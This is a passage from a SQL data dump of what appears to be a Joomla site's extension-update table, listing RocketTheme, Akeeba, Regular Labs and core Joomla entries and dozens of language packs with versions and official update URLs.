Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(19931,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(19932,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(19933,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(19934,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(19935,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(19937,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19938,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19939,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19940,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19941,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19942,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19943,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19944,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19945,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19946,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19947,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19948,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19949,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19950,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19951,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19952,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19953,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19954,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19955,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(19956,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19957,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19958,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19959,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19960,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19961,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19962,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19963,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19964,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19965,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19966,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19967,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19968,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19969,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19970,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19971,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19972,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19973,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19974,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19975,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19976,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19977,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19978,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19979,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19980,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19981,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19982,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19983,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19984,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19985,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19986,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19987,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(19988,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(19989,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(19990,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19991,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19992,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19993,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19994,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19995,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19996,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19997,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19998,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19999,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20000,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20001,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20002,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20003,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20004,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20005,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20006,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20007,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20008,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20009,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20010,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20011,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20012,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20013,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20014,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20015,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20016,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20017,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20018,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20019,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20020,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20021,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20022,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20023,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20024,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20025,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20026,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20027,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20028,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20029,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20030,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20031,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20032,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20033,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20034,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20035,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20036,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20037,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20038,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20039,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20040,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20041,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(20042,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(20043,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(20044,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(20045,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(20046,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(20047,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(20048,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(20049,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(20050,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20051,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20052,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20053,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20054,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20055,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20056,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20057,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20058,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20059,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20060,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20061,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20062,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20063,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20064,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20065,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20066,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20067,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20068,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20069,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20070,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20071,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20072,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20073,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20074,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20075,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20076,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20077,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20078,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20079,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20080,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20081,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20082,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20083,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20084,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20085,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20086,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20087,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20088,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20089,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20090,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20091,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20092,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20093,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20094,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20095,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20096,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20097,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20098,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20099,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(20100,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(20101,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(20102,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(20103,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20104,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20105,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20106,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20107,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(20108,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20109,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20110,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20111,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20112,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(20113,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20114,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20115,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20116,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20117,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(20118,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20119,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20120,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20121,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20122,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20123,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20124,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20125,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20126,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20127,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20128,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20129,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20130,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20131,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20132,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20133,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20134,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20135,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20136,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20137,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20138,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20139,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20140,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20141,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20142,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20143,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20144,3,0,'English 